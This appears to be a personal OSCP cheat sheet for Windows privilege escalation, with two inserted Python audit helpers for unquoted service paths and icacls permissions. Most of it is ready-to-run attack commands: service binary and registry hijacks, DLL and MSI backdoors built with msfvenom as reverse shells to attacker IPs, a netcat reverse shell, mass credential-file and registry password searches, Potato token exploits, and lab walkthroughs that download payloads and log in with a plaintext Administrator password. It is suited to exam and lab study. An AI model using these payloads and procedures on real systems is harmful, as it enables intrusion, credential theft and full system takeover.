In the OSCP exam, only gaining access is not enough. Most of the machines may require escalating to a higher privilege. To learn more about Windows privilege escalation I have taken a course from Udemy, watched IPSec YouTube videos, and read tutorials from various sources. Whatever I have learned, I took notes on.
I have organized my notes as a cheat sheet and now it is public.
Note:
A cheat sheet is not understandable without basic knowledge! After all, a cheat sheet is not a tutorial!
Checklist
I would like to follow two standard checklists and cheat sheets available online:
Helpful Tools
- WinPEAS: checks for common misconfigurations that may lead to privilege escalation.
- PowerUp: a PowerShell script that checks for common vulnerabilities.
- Windows-Exploit-Suggester: a Windows kernel exploit suggester.
- icacls (Windows): displays the Access Control List of the specified files.
Example:
All tools first need to be transferred to the target machine!
Winpeas:
.\winpeas.exe
.\winpeas.exe serviceinfo
PowerUp:
powershell.exe -exec bypass
. .\PowerUp.ps1
Invoke-AllChecks
Windows Exploit Suggester:
From the target, first collect the output of the systeminfo command and save it in Kali.
python windows-exploit-suggester.py -u
python windows-exploit-suggester.py -i systeminfo.txt -d *.xls
icacls:
icacls "path_to_check"
Enumeration
We need to enumerate basic information before attempting to escalate privileges.
#Get Windows Version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
#Get patch Information
wmic qfe get Caption, Description, HotFixID, InstalledOn
#Get current username
whoami
#Get groups and permission information
whoami /all
#get user list
net user
#get information for specific user
net user admin
#Get OS information like version, hotfix etc.
systeminfo
#List network connections and listening ports with the owning PID. Note the suspicious ones!
netstat -ano
#List all profile's firewall rules!
netsh advfirewall firewall show rule name=all
#List all installed software.
wmic product get name
#List all installed software and version.
wmic product get name, version
#Get scheduled task list
schtasks /query /fo LIST /v
#Running processes and the services they host
tasklist /SVC
#List loaded drivers (check them for known vulnerable versions)
driverquery.exe /fo table
Kernel Exploits
Kernel exploits can be dangerous, so a kernel exploit should only be run if there is no other way to escalate privileges.
Get the system information and transfer it to the remote Linux host. This is the command we need to run before we search for exploits on Google or with Searchsploit:
$ systeminfo
Use Windows Exploit Suggester to get exploit suggestions:
python windows-exploit-suggester.py -u
python windows-exploit-suggester.py -i systeminfo.txt -d *.xls
We can use the information generated by Windows-Exploit-Suggester to find compiled exploits at the following link:
https://github.com/SecWiki/windows-kernel-exploits
Find exploits on Google and with Searchsploit. Example:
Google> Windows Version Privilege Escalation Exploit
Searchsploit> $ searchsploit windows 10
Service Exploits
If a service is improperly configured, it may allow escalation to a higher privilege. There are five ways a service can be exploited:
- Insecure Service Permission
- Unquoted Service Path
- Insecure Registry Permission
- Insecure Service Executable
- DLL Hijacking
Service Enumeration
We should find all running services and their versions.
#cmd
tasklist /SVC
#powershell
Get-Service
#wmic
wmic service list brief
Listing All Running Services
sc queryex type= service
powershell.exe -c "Get-Service | Where-Object {$_.Status -eq 'Running'}"
Search for more info on a suspicious service with this cmd/PowerShell command:
sc queryex type= service state= all | find /i "SERVICE_NAME: service_name"
#or
powershell.exe -c "Get-Service | Where-Object {$_.Name -like '*service_name*'}"
Find the status of the target service. We can check with these commands:
sc query service_name
Get-Service service_name
Modifying a service's binary path
sc config service_name binpath= "c:\windows\temp\shell.exe"
Start and Stop a Service
net start serv_name
net stop serv_name
Exploit Insecure Service Permissions
We need to find a suspicious service. If the service grants our user SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS, we can exploit it by changing its binary path.
sc qc service_name
sc config service_name binpath= "c:\windows\temp\backdoor.exe"
net stop service_name
net start service_name
Exploiting Unquoted Service Paths
If a service's binary path is not enclosed in quotes, it may help us escalate privileges. Any folder along the service path needs to be writable. For example, I found C:\Program Files\Deploy Ready\Service Files\Deploy.exe. In the C:\Program Files\ directory, the "Deploy Ready" and "Service Files" subdirectories are writable. We can exploit this vulnerability to escalate privileges. How does it work?
- When starting the service, if it fails to execute Deploy.exe
- it will execute C:\Program Files\Deploy Ready\Service.exe
- If Service.exe is not found, C:\Program Files\Deploy.exe will be executed!
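The search order above, generalized to any unquoted path (any number of spaces, and arguments after the .exe), as an added Python audit helper that is not part of the original cheat sheet. It lists, shortest prefix first, every location CreateProcess tries before the real binary, so each of those directories can be checked for write access with icacls or accesschk. The wmic CSV is constructed; the Backup Tool and Spooler rows are made up to show the filters.

```python
"""List the executables Windows would try for an unquoted service path.
Added example (not from the original cheat sheet); the wmic CSV below is
constructed, not captured from a real host."""
import csv
import io
from typing import Dict, List


def unquoted_path_candidates(pathname: str) -> List[str]:
    """Return every path CreateProcess tries before the real binary, in the
    order it tries them: the prefix up to each space, with .exe appended.
    A quoted path or a path without spaces yields no candidates."""
    if pathname.startswith('"'):
        return []
    end = pathname.lower().find(".exe")
    if end == -1:
        return []
    binary = pathname[:end + 4]           # drop service arguments after .exe
    return [binary[:i] + ".exe" for i, ch in enumerate(binary) if ch == " "]


def audit_wmic_csv(text: str) -> Dict[str, List[str]]:
    """Parse `wmic service get name,pathname,startmode /format:csv` output
    and map each auto-start service with an unquoted, space-containing path
    outside C:\\Windows (the same filter as the findstr chain on this page)
    to the candidate binaries Windows would try first."""
    findings: Dict[str, List[str]] = {}
    # QUOTE_NONE keeps the surrounding quotes of properly quoted paths
    reader = csv.DictReader(io.StringIO(text.strip()), quoting=csv.QUOTE_NONE)
    for row in reader:
        path = row["PathName"]
        if row["StartMode"].lower() != "auto":
            continue
        if path.lower().strip('"').startswith("c:\\windows\\"):
            continue
        candidates = unquoted_path_candidates(path)
        if candidates:
            findings[row["Name"]] = candidates
    return findings


# Constructed sample output (wmic prints a Node column first).
WMIC_CSV = r"""
Node,Name,PathName,StartMode
DEPLOYABLE,AmazonSSMAgent,"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe",Auto
DEPLOYABLE,Deploy,C:\Program Files\Deploy Ready\Service Files\Deploy.exe,Auto
DEPLOYABLE,Backup Tool,C:\Backup Tool\backup.exe -service,Manual
DEPLOYABLE,Spooler,C:\Windows\System32\spoolsv.exe,Auto
"""

if __name__ == "__main__":
    for name, cands in audit_wmic_csv(WMIC_CSV).items():
        # none of these locations may be writable by low-privileged users
        print(name, cands)
```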
Find the Vulnerability
#Manually
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
#With winpeas
.\winPEAS.exe quiet servicesinfo
Test if any directory is writable:
- Manually
echo "Test" > "C:\Path a\Path b\Path c\test.txt" #No "Access is denied"? Then we can write there
icacls "C:\Path a\Path b\Path c\test.txt" #F=Full, W=Write
- With AccessChk (more efficient)
.\accesschk.exe /accepteula -uwdq C:\
.\accesschk.exe /accepteula -uwdq "C:\Program Files\"
.\accesschk.exe /accepteula -uwdq "C:\Program Files\Service Path"
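When many paths have to be checked, saved icacls output can be triaged automatically. The following is an added Python example, not part of the original cheat sheet: it parses icacls output and flags principals every ordinary user belongs to (BUILTIN\Users, Everyone, Authenticated Users, ...) that hold write-capable rights. The ACL samples are constructed to mirror the icacls output format shown later on this page.

```python
"""Flag low-privileged principals that hold write rights in icacls output.
Added example (not from the original cheat sheet); the ACL samples below
are constructed to mirror the icacls output format shown on this page."""
import re
from typing import Dict, List, Set

# Principals that every ordinary local user (our low-privileged shell) holds.
LOW_PRIV = {"everyone", r"builtin\users", r"builtin\guests",
            r"nt authority\authenticated users", r"nt authority\interactive"}
# icacls right tokens that let a principal change the object or its ACL:
# full, modify, write, generic all/write, write/append data, write DAC/owner.
WRITE_RIGHTS = {"F", "M", "W", "GA", "GW", "WD", "AD", "WDAC", "WO"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}   # inheritance, not rights


def parse_icacls(path: str, output: str) -> Dict[str, Set[str]]:
    """Map each principal in `icacls <path>` output to its right tokens. The
    first ACE follows the queried path on line one; the rest are indented."""
    aces: Dict[str, Set[str]] = {}
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        if ":(" not in line:                     # summary or blank line
            continue
        principal, rights = line.rsplit(":", 1)  # rights never contain ':'
        tokens = set()
        for group in re.findall(r"\(([^)]*)\)", rights):
            tokens.update(t for t in group.split(",") if t not in INHERIT_FLAGS)
        aces.setdefault(principal.strip(), set()).update(tokens)
    return aces


def low_priv_writers(path: str, output: str) -> List[str]:
    """Return the low-privileged principals that can modify `path`."""
    aces = parse_icacls(path, output)
    return sorted(p for p, rights in aces.items()
                  if p.lower() in LOW_PRIV and rights & WRITE_RIGHTS)


# Constructed sample: the weak ACL on a service binary, as seen on this page.
SERVICE_EXE = r"Services\monitor1.exe"
SERVICE_EXE_ACL = r"""Services\monitor1.exe BUILTIN\Users:(I)(F)
                      NT AUTHORITY\SYSTEM:(I)(F)
                      BUILTIN\Administrators:(I)(F)
Successfully processed 1 files; Failed processing 0 files
"""
# Constructed sample: a directory where Users only have read and execute.
SAFE_DIR = r"C:\Program Files\Amazon\SSM"
SAFE_DIR_ACL = r"""C:\Program Files\Amazon\SSM NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                            BUILTIN\Administrators:(I)(OI)(CI)(F)
                            BUILTIN\Users:(I)(OI)(CI)(RX)
Successfully processed 1 files; Failed processing 0 files
"""
```

Run `low_priv_writers(path, output)` on each saved ACL; a non-empty list means the path (a service binary, a directory on an unquoted path, or a startup folder) is writable by ordinary users and should be fixed.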
Exploit
If we don't have permission to restart the service, we can try to reboot the machine. If the service is configured as AUTO_START and runs as LocalSystem, we will get a SYSTEM shell.
sc qc "service_name"
copy \\smb_ip\Service.exe "C:\Program Files\Deploy Ready\Service.exe"
net start service_name
#If unable to start the service, try rebooting
shutdown /r /t 0
Insecure Registry Permission
If we can't write to the service's directory/folder but can modify its registry key, we can escalate privileges.
Find Services
#Get All Services info
.\winPEAS.exe quiet servicesinfo
reg query hklm\System\CurrentControlSet\Services /s /v imagepath
Confirm Registry weak permission
#Confirm weak permissions with a PowerShell command
Get-Acl HKLM:\System\CurrentControlSet\Services\SrvName |Format-List
#Confirm with accesschk
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\SrvName
Exploit
If we have confirmed that we can modify the registry:
#Add Backdoor to the Registry
reg add HKLM\SYSTEM\CurrentControlSet\Services\SrvName /v ImagePath /t REG_EXPAND_SZ /d C:\windows\temp\backdoor.exe /f
#Start the service
net start SrvName
DLL Hijacking
If a program or service cannot find a DLL it loads from the specified directory, we can supply our own malicious DLL for escalation. The folder the DLL is loaded from needs to be writable!
Check the permissions of the program folder
icacls C:\program\
Create a malicious DLL file and move the payload to the directory the program loads from.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attack_IP LPORT=attacker_port -f dll -o existing.dll
Now try to restart the service or execute the vulnerable program.
Exploit Startup Programs
We need to copy accesschk64.exe to the remote host to check permissions. If we have FILE_ALL_ACCESS on a program, we can exploit it for a SYSTEM shell.
accesschk64.exe -wvu "C:\Program Files\Autorun Program"
copy \\smb_ip\backdoor.exe "C:\Program Files\Autorun Program\program.exe"
We can also get an admin session by exploiting startup applications. Check the permissions: if the folder is writable, we just need to copy our shell.exe to that folder and wait for an admin to log in.
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
copy \\smb_ip\bak.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\bak.exe"
Exploiting AlwaysInstallElevated
We need to check whether it is enabled. If the AlwaysInstallElevated value is 0x1, we can exploit it!
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
Generate a backdoor with Metasploit and transfer it to the victim machine:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tester_ip LPORT=tester_port -f msi -o smb-folder/shell.msi
Copy shell.msi to the victim machine via SMB or another way and run:
msiexec /quiet /qn /i shell.msi
Exploiting Clear Text Passwords
If we are lucky, we may find passwords in clear text.
Note: This section is heavily copied from https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials
Finding WiFi passwords
netsh wlan show profile
netsh wlan show profile <SSID> key=clear
Search sensitive files that may contain credentials
cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == SCClient.exe == *_history == .sudo_as_admin_successful == .profile == *bashrc == httpd.conf == *.plan == .htpasswd == .git-credentials == *.rhosts == hosts.equiv == Dockerfile == docker-compose.yml == appcmd.exe == TypedURLs == TypedURLsTime == History == Bookmarks == Cookies == "Login Data" == places.sqlite == key3.db == key4.db == credentials == credentials.db == access_tokens.db == accessTokens.json == legacy_credentials == azureProfile.json == unattend.txt == access.log == error.log == *.gpg == *.pgp == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12 == *.der == *.csr == *.cer == known_hosts == id_rsa == id_dsa == *.ovpn == anaconda-ks.cfg == hostapd.conf == rsyncd.conf == cesi.conf == supervisord.conf == tomcat-users.xml == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == unattend.xml == unattended.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == groups.xml == services.xml == scheduledtasks.xml == printers.xml == drives.xml == datasources.xml == php.ini == https.conf == https-xampp.conf == httpd.conf == my.ini == my.cnf == access.log == error.log == server.xml == SiteList.xml == ConsoleHost_history.txt == setupinfo == setupinfo.bak 2>nul | findstr /v ".dll"
Search for "Password"
#Search suspicious files from filename
dir /s /W *pass* == *cred* == *vnc* == *.config* | findstr /i /v "\\windows"
#Search suspicious files from content
findstr /D:C:\ /si password *.xml *.ini *.txt #A lot of output can be generated
findstr /D:C:\ /M /SI password *.xml *.ini *.txt 2>nul | findstr /V /I "\\AppData\\Local \\WinXsX ApnDatabase.xml \\UEV\\InboxTemplates \\Microsoft.Windows.CloudExperienceHost" 2>nul
Search Password in Registry
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" #Autologin
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s #Check the values saved in each session, user/password could be there
reg query "HKCU\Software\OpenSSH\Agent\Key"
# Search for passwords inside all the registry
reg query HKLM /f password /t REG_SZ /s #Look for registries that contains "password"
reg query HKCU /f password /t REG_SZ /s #Look for registries that contains "password"
Try with WinPEAS:
.\winPEAS.exe quiet filesinfo userinfo
RunAs
Using cmdkey
cmdkey /list
runas /savecred /user:Administrator "c:\windows\temp\backdoor.exe"
By providing credentials (runas prompts for the password)
C:\Windows\System32\runas.exe /env /noprofile /user:<username> "c:\users\Public\nc.exe -nv <attacker-ip> 4444 -e cmd.exe"
Exploiting Well-Known Software
Some software installed on the target machine may have a public exploit. We should search Google for an exploit matching the version of the installed software.
tasklist /v
.\winpeas.exe quiet processinfo
Scheduled Tasks
#from CMD
schtasks /query /fo LIST /v
#In Powershell
PS> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
For example, the above command found that C:\Tools\Adm.Ps1 runs every 10 minutes as SYSTEM and we have rights to modify it:
accesschk.exe /accepteula -quvw user C:\Tools\Adm.Ps1
We can simply append our command so that it executes as SYSTEM. Let's append a command to run rev.exe (a reverse shell to port 443):
echo C:\windows\temp\rev.exe>> C:\Tools\Adm.Ps1
If everything goes well, we should have a SYSTEM shell within 10 minutes!
Dangerous User Privileges
Some user privileges are dangerous: they can lead to escalation to a higher privilege. I will list some of them:
SeImpersonatePrivilege
Allows acting as any other user, such as Administrator. This can be exploited with JuicyPotato.
SeAssignPrimaryTokenPrivilege
Allows assigning an access token to a new process. Can be exploited with JuicyPotato.
SeBackupPrivilege
A user with this privilege is able to read any file. That means the user can extract password hashes from the registry, which can be used for a pass-the-hash attack.
SeRestorePrivilege
This privilege allows a user to modify service binaries and DLLs, and also to modify registry settings.
Other risky privileges
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeDebugPrivilege
Hot Potato Exploit
A Tutorial: https://pentestlab.blog/2017/04/13/hot-potato/
Windows 7
.\Potato.exe -ip <local ip> -cmd <command to run> -enable_defender true -enable_spoof true -disable_exhaust true
Windows 10
.\Potato.exe -ip <local ip> -cmd <cmd to run> -disable_exhaust true -disable_defender true
Juicy Potato
If the user has SeImpersonate or SeAssignPrimaryToken, JuicyPotato can be used to escalate privileges.
Note: CLSID can be found in: https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
JuicyPotato.exe -l 4444 -p C:\Windows\Temp\Rev.exe -t * -c {CLS_ID}
Rogue Potato
Just another Windows local privilege escalation from a service account to SYSTEM. So the requirement is that the compromised account needs to be a service account.
.\RoguePotato.exe -r 192.168.1.11 -l 9999 -e "C:\Windows\Temp\rev.exe"
Quick Real Example
Unquoted Service
systeminfo
Host Name: DEPLOYABLE
OS Name: Microsoft Windows Server 2012 R2 Datacenter
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
--------------------------------------------------
>whoami /all
USER INFORMATION
User Name SID
================= =============================================
deployable\tomcat S-1-5-21-2340103987-1023754366-731290932-1001
GROUP INFORMATION
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
.......
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
.......
PRIVILEGES INFORMATION
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
> wmic product get name, version
>
> powershell -c Invoke-WebRequest "http://10.10.0.67:8000/WinPeas.exe" -OutFile "wino.exe"
> .\wino.exe serviceinfo
......
Deploy(Deploy)[C:\Program Files\Deploy Ready\Service Files\Deploy.exe] - Manual - Stopped - No quotes and Space detected
......
> cd "C:\Program Files\Deploy Ready\"
Generating the exploit in Kali, starting a Python web server and listening for the connection:
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.0.67 LPORT=1337 -f exe > Deploy.exe
$ python3 -m http.server
$ nc -lvp 1338
Downloading and running the exploit on Windows:
sc qc deploy
>powershell -c Invoke-WebRequest "http://10.10.0.67:8000/Deploy.exe" -OutFile "C:\Program Files\Deploy Ready\Service.exe"
>sc start deploy
Clear Text Password
I was just able to get a shell by exploiting BlogEngine. I uploaded WinPEAS and it was able to find AutoLogon credentials.
Here are the steps I did in Kali to get Administrator access:
winexe -U Administrator%PzCEKhvj6gQMk7kA //172.3.1.6 cmd.exe
Escalated with JuicyPotato
If the user has SeImpersonate or SeAssignPrimaryToken privileges, then you are SYSTEM.
Note: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809+.
Generated another shell:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.0.67 LPORT=1338 -f exe > shell1338.exe
Uploaded JuicyPotato.exe and shell1338.exe:
powershell -c Invoke-WebRequest "http://10.10.0.67:8000/shell1338.exe" -OutFile "shell1338.exe"
powershell -c Invoke-WebRequest "http://10.10.0.67:8000/JuicyPotato.exe" -OutFile "JuicyPotato.exe"
Execute for a SYSTEM shell (the CLSID can be found at http://ohpe.it/juicy-potato/CLSID/ and https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md; not tested):
JuicyPotato.exe -t * -l 1010 -p shell1338.exe
JuicyPotato.exe -t * -l 1010 -p shell1338.exe -c {cls_id}
Modify Binary to Escalate
I was logged in via evil-winrm. WinPEAS did not find anything, so I tried manual enumeration. Here are the steps of the escalation:
Evil-WinRM PS C:> services
Path Privileges Service
---- ---------- -------
"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" False AmazonSSMAgent
"C:\Program Files\Amazon\XenTools\LiteAgent.exe" False AWSLiteAgent
"C:\Program Files\Amazon\cfn-bootstrap\winhup.exe" False cfn-hup
C:\Services\monitor1.exe True monitor1
C:\Services\monitor2.exe True monitor2
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe False PerfHost
C:\Windows\servicing\TrustedInstaller.exe False TrustedInstaller
Evil-WinRM PS C:> icacls Services\monitor1.exe
Services\monitor1.exe BUILTIN\Users:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
Successfully processed 1 files; Failed processing 0 files
Evil-WinRM PS C:\services> upload /home/bytef/cybsec/monitor1.exe
Info: Uploading /home/bytef/cybsec/monitor1.exe to C:\services\monitor1.exe
Data: 98400 bytes of 98400 bytes copied
Info: Upload successful!
Evil-WinRM PS C:\services> cmd /c "sc start monitor1"
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
Evil-WinRM PS C:\services>
And quickly I got a SYSTEM shell.